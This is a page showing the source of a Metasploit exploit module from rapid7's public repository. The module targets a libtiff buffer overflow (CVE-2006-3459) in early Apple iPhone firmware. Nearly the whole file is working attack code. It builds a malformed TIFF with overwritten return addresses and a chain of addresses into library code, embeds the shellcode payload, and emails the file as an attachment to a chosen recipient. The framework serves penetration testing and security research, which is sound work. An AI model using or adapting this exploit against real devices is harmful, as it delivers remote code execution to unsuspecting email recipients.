Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/apple_ios/email/mobilemail_libtiff.rb
32545 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  #

10
  # This module sends email messages via smtp

11
  #

12
  include Msf::Exploit::Remote::SMTPDeliver

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a buffer overflow in the version of

21
          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and

22
          1.1.1 of the Apple iPhone. iPhones which have not had the BSD

23
          tools installed will need to use a special payload.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => ['hdm', 'kf'],

27
        'References' => [

28
          ['CVE', '2006-3459'],

29
          ['OSVDB', '27723'],

30
          ['BID', '19283']

31
        ],

32
        'Stance' => Msf::Exploit::Stance::Passive,

33
        'Payload' => {

34
          'Space' => 1800,

35
          'BadChars' => '',

36
          'Compat' => {

37
            'ConnectionType' => '-bind -find'

38
          }

39
        },

40
        'Arch' => ARCH_ARMLE,

41
        'Targets' => [

42
          [

43
            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',

44
            {

45
              'Platform' => 'osx',

46


47
              # Scratch space for our shellcode and stack

48
              'Heap' => 0x00802000,

49


50
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib

51
              'Magic' => 0x300d562c

52
            }

53
          ],

54
        ],

55
        'DefaultTarget' => 0,

56
        'DisclosureDate' => '2006-08-01',

57
        'Notes' => {

58
          'Stability' => [ CRASH_SERVICE_DOWN ],

59
          'SideEffects' => [ IOC_IN_LOGS ],

60
          'Reliability' => [ UNRELIABLE_SESSION ]

61
        }

62
      )

63
    )

64
  end

65


66
  def autofilter

67
    false

68
  end

69


70
  def exploit

71
    exts = ['jpg', 'tiff', 'tif']

72


73
    gext = exts[rand(exts.length)]

74
    data = Rex::Text.rand_text_alpha(1..32)

75
    tiff = generate_tiff(target)

76


77
    msg = Rex::MIME::Message.new

78
    msg.mime_defaults

79
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(1..32)

80
    msg.to = datastore['MAILTO']

81
    msg.from = datastore['MAILFROM']

82


83
    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), 'text/plain', 'base64', 'inline')

84
    msg.add_part_attachment(tiff, rand_text_alpha(1..32) + '.' + gext)

85


86
    send_message(msg.to_s)

87


88
    print_status('Waiting for a payload session (backgrounding)...')

89
  end

90


91
  def generate_tiff(targ)

92
    #

93
    # This is a TIFF file, we have a huge range of evasion

94
    # capabilities, but for now, we don't use them.

95
    #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday

96
    #

97


98
    lolz = 2048

99
    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"

100
    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

101
    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"

102
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"

103
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"

104
    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"

105
    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"

106
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"

107
    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"

108
    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"

109
    tiff << [lolz].pack('V')

110
    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"

111


112
    # Randomize the bajeezus out of our data

113
    hehe = rand_text(lolz)

114


115
    # Were going to candy mountain!

116
    hehe[120, 4] = [targ['Magic']].pack('V')

117


118
    # >> add r0, r4, #0x30

119
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')

120


121
    # Candy mountain, Charlie!

122
    # >> mov r1, sp

123


124
    # It will be an adventure!

125
    # >> mov r2, r8

126
    hehe[92, 4] = [ hehe.length ].pack('V')

127


128
    # Its a magic leoplurodon!

129
    # It has spoken!

130
    # It has shown us the way!

131
    # >> bl _memcpy

132


133
    # Its just over this bridge, Charlie!

134
    # This magical bridge!

135
    # >> ldr r3, [r4, #32]

136
    # >> ldrt r3, [pc], r3, lsr #30

137
    # >> str r3, [r4, #32]

138
    # >> ldr r3, [r4, #36]

139
    # >> ldrt r3, [pc], r3, lsr #30

140
    # >> str r3, [r4, #36]

141
    # >> ldr r3, [r4, #40]

142
    # >> ldrt r3, [pc], r3, lsr #30

143
    # >> str r3, [r4, #40]

144
    # >> ldr r3, [r4, #44]

145
    # >> ldrt r3, [pc], r3, lsr #30

146
    # >> str r3, [r4, #44]

147


148
    # We made it to candy mountain!

149
    # Go inside Charlie!

150
    # sub sp, r7, #0x14

151
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')

152


153
    # Goodbye Charlie!

154
    # ;; targ['Heap'] + 0x48 becomes the stack pointer

155
    # >> ldmia sp!, {r8, r10}

156


157
    # Hey, what the...!

158
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

159


160
    # Return back to the copied heap data

161
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')

162


163
    # Insert our actual shellcode at heap location + 196

164
    hehe[196, payload.encoded.length] = payload.encoded

165


166
    tiff << hehe

167
  end

168
end

169


170